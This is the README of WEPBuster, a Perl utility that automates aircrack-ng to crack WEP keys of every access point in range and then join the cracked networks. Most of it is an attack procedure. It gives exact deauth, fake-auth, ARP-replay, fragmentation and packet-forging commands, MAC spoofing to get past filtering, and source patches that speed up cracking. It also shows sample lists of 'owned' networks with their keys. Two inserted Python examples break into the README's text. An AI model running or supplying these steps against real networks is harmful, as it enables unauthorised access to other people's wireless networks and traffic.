##################################################################################
WEPBuster 1.0
Author: Mark Jayson Alvarez
Date Started: April 2009
DESCRIPTION:
This small utility was written for information security professionals to
aid in conducting wireless security assessments. The program executes
various utilities included in the aircrack-ng suite, a set of tools for
auditing wireless networks, in order to obtain the WEP encryption key of
a wireless access point. aircrack-ng can be obtained from
OUTPUT:
(owned.txt)
BSSID CHANNEL SSID KEY TIMESTAMP
00:21:29:7D:5E:EB === 11 === Zakhal === 08:6D:38:15:30 === 1243883642
00:12:29:1D:E1:B3 === 1 === amnah === 68:28:1a:3c:20 === 1243883642
(owned_rtt.txt)
BSSID CHANNEL SSID KEY TIMESTAMP AVERAGE RTT (PACKET LOSS)
00:21:29:7D:5E:EB === 11 === ap1 === 08:6D:38:15:30 === 183642 === 7.2(0% loss)
00:12:29:1D:E1:B3 === 1 === ap2 === 68:28:1a:3c:20 === 124642 === 9.3(10% loss)
(found_ap.txt)
BSSID CHANNEL SSID
00:21:29:7D:5E:EB 11 Zakhal
00:12:29:1D:E1:B3 1 amnah
USAGE:
perl wepbuster [channel/s] (or any combination, space separated)
perl wepbuster (sort | connect) [HOST | IP] (defaults to: gateway)
Typically, one would invoke the program without any arguments. Doing this
sets the mode to 'crack' and tries to crack all WEP-enabled access points
within range on each of the non-overlapping channels of the country
specified (1, 6, 11 for US; 1, 5, 9, 13 for EU).
Given one or more channel numbers as arguments, the mode is set to 'crack'
and only the APs on those particular channels are attacked.
If passed a 'sort' argument, followed by an optional IP address or hostname,
the program sorts the list of cracked access points (obtained after running
'crack' mode) in order of increasing ping round-trip time to the gateway,
or to the IP address or hostname specified.
If passed a 'connect' argument, followed by an optional IP address or
hostname, the program tries to connect to each access point in the list of
cracked access points. The program exits once a connection is verified,
i.e. once it can successfully ping the gateway or the IP address or
hostname specified.
RECOMMENDED MODIFICATIONS (OPTIONAL):
Starting with 1.0 beta_0.6, wepbuster works with the vanilla aircrack-ng
releases (aircrack-ng 1.0 rc4 and above). The first modification to the
aircrack-ng source makes aircrack-ng retry more often, so the key is found
closer to the minimum number of IVs actually needed. The second one shortens
the time aireplay-ng waits before trying a new data packet in the
fragmentation attack.
1.) Instead of 5000, change PTW_TRY_STEP to 100 to tell aircrack-ng to retry
cracking the WEP key (after a previous failed attempt) as soon as it has
collected 100 new IVs.
Look for this line in "aircrack-ng.h":
#define PTW_TRY_STEP 5000
2.) When the IV count has not gone beyond 300 after 30 sleeps, wepbuster tries
aireplay-ng's fragmentation attack (-5).
To shorten the number of retries when there is no answer from the AP,
change "round > 10" to "round > 2" in the aireplay-ng source:
PCT; printf("No answer, repeating...\n");
....
....
if (round > 10)
In most cases, the fragmentation attack very quickly yields a keystream for
forging ARP packets that can be used for the ARP replay attack, which is a
fast way to generate unique IVs for the quickest WEP cracking technique so
far, the PTW attack. Changing the value above further speeds up the
fragmentation attack.
REQUIREMENTS:
- aircrack-ng 1.0 rc4 and above
- perl installation with standard libraries (threading support)
- Term::ReadKey
- Expect.pm
- macchanger (www.alobbs.com/macchanger)
- miscellaneous unix programs
- ifconfig, iwconfig, rm, pkill, stty, cp, touch, mv, route, ping,
dhclient, netstat
TESTING PLATFORM:
During the development, this program was tested inside an Ubuntu Linux
installation, using Alfa AWUS036H with R8187 driver.
The access points tested were Aztech DSL605EW and Linksys WAG54G2
WARNINGS:
Other Linux platforms were not tested. The wireless card mentioned above
is the only card that was used; others are not guaranteed to work without
making changes. I don't have all the necessary hardware to test.
I'm leaving this work to the community. Please contribute so that everyone
can benefit.
FINAL THOUGHTS:
This is the first program I have provided to the opensource community.
I hope you'll find it useful. Donations are welcome if you do =).
Send them to my paypal account: markjayson.alvarez@gmail.com
Please use this program in a good way and remember:
"Morality works best when chosen not when mandated"
- Larry Wall
Author, Perl Programming Language
LINKS
##################################################################################
Steps Taken During The Program Execution:
The following is a detailed breakdown of the steps taken during program
execution. It should be read alongside the actual source code.
- Run airmon-ng and put each wireless card into monitor mode, obtaining the monitor
  interface name created in the process
- Obtain the MAC address by parsing ifconfig(8) output
- Argument verification:
  - Can accept 'sort' and 'connect' followed by an optional IP address or a hostname
  - Can accept any combination of 1, 6, 11 for US non-overlapping channels and
    1, 5, 9, 13 for EU non-overlapping channels
  - If no valid channels were entered, defaults to all channels of the $country specified
- Verify existence of the cracked APs list ("owned.txt") before running 'sort' or 'connect' mode.
- Scan each of the specified channels for a certain duration and build
  an overall list of WEP-enabled access points including all the clients currently
  associated to each.
  airodump-ng monitor_interface -t wep -c channel -n -w $filename 2>&1
- Verify that at least one access point was found during the initial scan before
  proceeding.
- Read the list of cracked APs (if there is any), so that later we can skip APs
  that have been cracked already. It is also useful for modes 'sort' and 'connect'
  so that we know whether we can connect to an AP (given the existence of the key).
- Read the list of "bad APs" (if there is any). If this list exists, the APs listed
  will be skipped. Useful in case the program stalls on an unusually behaving AP.
- Read the list of "known APs" (if there is any). If this list exists, only those
  APs that are listed will be processed. Useful to avoid illegally cracking APs
  that we're not allowed to.
-
Process the modes:
10.1 MODE 'CRACK'
- Process the "bad APs" list. Skip the AP if it is listed.
- Process the "known APs" list. Skip the AP if it is not listed.
- Process the "cracked APs" list. Skip the AP if it is included in the list and the
  key is at most 15 days old (counted from the day the key was found).
- REVEAL HIDDEN SSID
- Send a deauth broadcast 3 times.
  aireplay-ng -0 1 -a bssid inject_interface -h mac_address 2>&1
  If any associated clients were found in the initial scan, send each client a directed
  deauth plus only 2 deauth broadcasts.
  aireplay-ng -0 1 -a bssid inject_interface -h mac_address -c client_macaddress 2>&1
  The user can press the 'enter' key to send two more deauth broadcasts.
- If the SSID cannot be revealed, just name it 'hidden'.
- pkill airodump-ng and aireplay-ng just to make sure no other aircrack process
  is running before we begin.
- Delete all dump files in the current directory.
- Set the channel and rate.
- CHECK FOR MAC ADDRESS FILTERING and SHARED KEY AUTHENTICATION
- Do an initial fakeauth and check whether the AP is using MAC filtering or SKA.
  aireplay-ng -1 1 -a bssid inject_interface -e 'ssid' -h mac_address -D 2>&1
- If the AP is filtered, check whether we have any associated client whose MAC
  address we can spoof.
- If there is one, spoof our MAC using "macchanger"; otherwise, skip the AP.
- Run fakeauth with keep-alives (reassociate every 15 minutes) in the background.
  aireplay-ng -1 900 -o 1 -q 10 -a bssid inject_interface -e 'ssid' -h mac_address
- Run airodump-ng in the background and dump only data destined to the AP.
  airodump-ng monitor_interface -t wep -u 20 -d bssid -c channel --output-format pcap,csv -w inject_dump 2>&1
- Run the ARP replay attack in the background.
  aireplay-ng inject_interface -3 -b bssid -h mac_address 2>&1
- KEEP COUNTING IVs EVERY 1 SLEEP AND DISPLAY THE COUNT EVERY 5 SLEEPS
- If the IV count is less than 100 after 10 sleeps, send a deauth broadcast twice with
  a 2-sleep interval.
  aireplay-ng -0 1 -a bssid inject_interface -h mac_address
- If the IV count is less than 300 after 30 sleeps, try the fragmentation attack (-5)
  for $frag_timeout seconds (unless no IV at all has been captured, in which case the
  dump holds no data packet to fragment). Note that we are only reading a copy of the
  dump collected so far.
  aireplay-ng -5 inject_interface -b bssid -r inject_dump-01.cap.tmp -h mac_address
- If the attack was successful, build an ARP packet using the keystream found.
  packetforge-ng -0 -a bssid -h mac_address -k 255.255.255.255 -l 255.255.255.255 -y keystream_xor -w forged_arp.cap
- Then replay it for 3 seconds. (We already have an aireplay-ng -3 running, so we only
  need this one until the first aireplay-ng -3 picks up our forged ARP.)
  aireplay-ng inject_interface -3 -r forged_arp.cap -b bssid -h mac_address 2>&1
- When fragmentation exits, either because it has run out of data or because it has
  timed out, launch the rebroadcast attack (-p 0841).
  aireplay-ng inject_interface -2 -p 0841 -b bssid -c FF:FF:FF:FF:FF:FF -h mac_address 2>&1
- If after 20 minutes we are still trying, this is taking forever: skip the AP.
- BEGIN CRACKING THE KEY
- Once we have collected $min_iv (17000) IVs, start cracking the key using aircrack-ng.
  aircrack-ng -q -b bssid inject_dump-01.cap
- Add the key to the "cracked APs" (owned.txt) list once found.
- If the key cannot be found after $crack_timeout (15 minutes), skip the AP.
- If we suddenly get an error code while injecting, skip the AP. Possible presence
  of a WIPS.
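The two decision points of 'crack' mode described above, the bad/known/cracked list handling at the start and the deauth/fragmentation/skip/crack thresholds during injection, as an added Python example. This is not WEPBuster's own code (the tool is Perl and shells out to aircrack-ng); it only models the decisions and reads the owned.txt format shown under OUTPUT. The README does not name or specify the layout of the bad-AP and known-AP files, so parsing them as one BSSID in the first field per line (like found_ap.txt) is an assumption here; all sample data is constructed.

```python
"""Added example, not WEPBuster's own code: models the 'crack' mode decisions.

owned.txt records follow the README: BSSID === CHANNEL === SSID === KEY === TIMESTAMP.
The bad-AP / known-AP lists are assumed (the README does not specify them) to
carry one BSSID as the first whitespace-separated field per line, like found_ap.txt.
"""

CRACKED_MAX_AGE = 15 * 24 * 3600   # skip APs whose key is at most 15 days old
MIN_IV = 17000                     # $min_iv: start aircrack-ng at this count
INJECT_TIMEOUT = 20 * 60           # give up on injection after 20 minutes

# Constructed sample data in the README's formats (not real networks).
SAMPLE_OWNED = """\
00:21:29:7D:5E:EB === 11 === Zakhal === 08:6D:38:15:30 === 1243883642
00:12:29:1D:E1:B3 === 1 === amnah === 68:28:1a:3c:20 === 1242000000
"""
SAMPLE_FOUND = """\
BSSID CHANNEL SSID
00:21:29:7D:5E:EB 11 Zakhal
00:12:29:1D:E1:B3 1 amnah
00:1A:2B:3C:4D:5E 6 hidden
00:0F:66:AA:BB:CC 11 lab-ap
"""
SAMPLE_BAD = "00:1A:2B:3C:4D:5E\n"
SAMPLE_KNOWN = "00:21:29:7D:5E:EB\n00:12:29:1D:E1:B3\n00:1A:2B:3C:4D:5E\n"


def parse_owned(text):
    """Map BSSID -> (channel, ssid, key, timestamp) from owned.txt contents."""
    owned = {}
    for line in text.splitlines():
        parts = [p.strip() for p in line.split("===")]
        if len(parts) != 5:
            continue  # header, blank or malformed line
        bssid, channel, ssid, key, ts = parts
        owned[bssid.upper()] = (int(channel), ssid, key, int(ts))
    return owned


def parse_bssid_list(text):
    """BSSIDs (first field of each line) from found_ap.txt-style lists."""
    bssids = []
    for line in text.splitlines():
        fields = line.split()
        if fields and fields[0].count(":") == 5:
            bssids.append(fields[0].upper())
    return bssids


def select_targets(found, owned, bad, known, now):
    """Apply the three skip rules in the order the README lists them."""
    targets = []
    for bssid in found:
        if bssid in bad:
            continue                     # listed as misbehaving: skip
        if known and bssid not in known:
            continue                     # allow-list present, AP not on it
        rec = owned.get(bssid)
        if rec and now - rec[3] <= CRACKED_MAX_AGE:
            continue                     # key found recently: do not re-crack
        targets.append(bssid)
    return targets


def next_action(ivs, sleeps, elapsed, fragmented=False):
    """Decide what the injection loop does after one more sleep.

    Checkpoints mirror the README: deauth at 10 sleeps with < 100 IVs,
    fragmentation at 30 sleeps with < 300 IVs (only if at least one data
    packet was captured, otherwise the dump has nothing to fragment),
    skip after 20 minutes, crack once $min_iv is reached.
    """
    if ivs >= MIN_IV:
        return "crack"
    if elapsed >= INJECT_TIMEOUT:
        return "skip"
    if sleeps == 30 and 0 < ivs < 300 and not fragmented:
        return "fragment"
    if sleeps == 10 and ivs < 100:
        return "deauth"
    return "wait"
```

With the constructed lists, only amnah (cracked about 22 days before the sample "now") is selected: Zakhal was cracked a day earlier, the hidden AP is on the bad list, and lab-ap is absent from the known list. Dropping the known list makes lab-ap a target as well.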
10.2 MODE 'SORT'
- Verify that the AP is included in the list of owned APs. If it is not, we cannot
  connect to it because we don't have the key, and therefore cannot get
  the RTT, so we skip it.
- If we have the key, get the RTT with packet loss and record it. The RTT is that of
  our gateway or, if we specified a host, the ping RTT of that host instead. e.g.,
  "perl wepbuster sort www.google.com"
- Once we have the RTT for each AP, sort them and write the output into
  "owned_rtt.txt"
- Finally, rearrange "owned.txt" such that the order of the APs follows that of
  "owned_rtt.txt"
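The 'sort' mode bookkeeping above as an added Python example (not WEPBuster's own code, which is Perl and runs ping(8) through the shell): parse the summary lines Linux ping prints, order the cracked APs by average round-trip time, and emit owned_rtt.txt records in the format shown under OUTPUT. The ping transcripts and AP records embedded below are constructed; the "unreachable" marker for an AP that never answers is an assumption, since the README shows no such record.

```python
"""Added example, not WEPBuster's own code: the 'sort' mode bookkeeping.

Takes the summary Linux ping(8) prints per AP, orders cracked APs by average
round-trip time and writes owned_rtt.txt lines in the README's format
(owned.txt record + ' === <avg>(<loss>% loss)').
"""
import re

LOSS_RE = re.compile(r"(\d+)% packet loss")
RTT_RE = re.compile(r"rtt min/avg/max(?:/mdev)? = ([\d.]+)/([\d.]+)/([\d.]+)")

# Constructed owned.txt records (deliberately unsorted) and ping transcripts.
SAMPLE_OWNED = [
    "00:1A:2B:3C:4D:5E === 6 === ap3 === 00:11:22:33:44 === 1243883642",
    "00:12:29:1D:E1:B3 === 1 === ap2 === 68:28:1a:3c:20 === 1243883642",
    "00:21:29:7D:5E:EB === 11 === ap1 === 08:6D:38:15:30 === 1243883642",
]
SAMPLE_PINGS = {
    "00:21:29:7D:5E:EB": """\
PING 192.168.1.1 (192.168.1.1) 56(84) bytes of data.
64 bytes from 192.168.1.1: icmp_seq=1 ttl=64 time=7.1 ms

--- 192.168.1.1 ping statistics ---
10 packets transmitted, 10 received, 0% packet loss, time 9012ms
rtt min/avg/max/mdev = 6.8/7.2/7.9/0.3 ms
""",
    "00:12:29:1D:E1:B3": """\
--- 192.168.1.1 ping statistics ---
10 packets transmitted, 9 received, 10% packet loss, time 9014ms
rtt min/avg/max/mdev = 8.9/9.3/10.1/0.4 ms
""",
    "00:1A:2B:3C:4D:5E": """\
--- 192.168.1.1 ping statistics ---
10 packets transmitted, 0 received, 100% packet loss, time 9088ms
""",
}


def parse_ping(output):
    """Return (avg_rtt_ms, loss_pct), or None when nothing came back
    (ping then prints no rtt line at all)."""
    loss = LOSS_RE.search(output)
    rtt = RTT_RE.search(output)
    if loss is None or rtt is None:
        return None
    return float(rtt.group(2)), int(loss.group(1))


def bssid_of(record):
    """First '===' field of an owned.txt record."""
    return record.split("===")[0].strip()


def sort_by_rtt(records, pings):
    """Order owned.txt records by increasing average RTT; APs that never
    answered sort last, ties are broken by packet loss."""
    results = {b: parse_ping(out) for b, out in pings.items()}

    def key(record):
        m = results.get(bssid_of(record))
        return (1, 0.0, 100) if m is None else (0, m[0], m[1])

    return sorted(records, key=key), results


def owned_rtt_lines(ordered, results):
    """owned_rtt.txt records: the owned.txt record plus the RTT field.
    The 'unreachable' marker is this example's choice, not the README's."""
    lines = []
    for record in ordered:
        m = results.get(bssid_of(record))
        rtt = "unreachable(100% loss)" if m is None else f"{m[0]:.1f}({m[1]}% loss)"
        lines.append(f"{record} === {rtt}")
    return lines
```

The list returned by sort_by_rtt is also the order in which owned.txt would be rewritten, which is the last step of 'sort' mode.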
10.3 MODE 'CONNECT'
- Read "owned.txt" sequentially and connect to each AP. The connection is verified if
  we can ping the gateway or whatever host we specified on the command line. e.g.,
  "perl wepbuster connect www.google.com"
- Once connected to an AP, we're done.
- During modes sort and connect, when testing for connectivity, we initially set our
  IP address manually to 192.168.1.150 and the gateway to 192.168.1.1. If we cannot
  'connect', we try to obtain an IP address via DHCP using dhclient.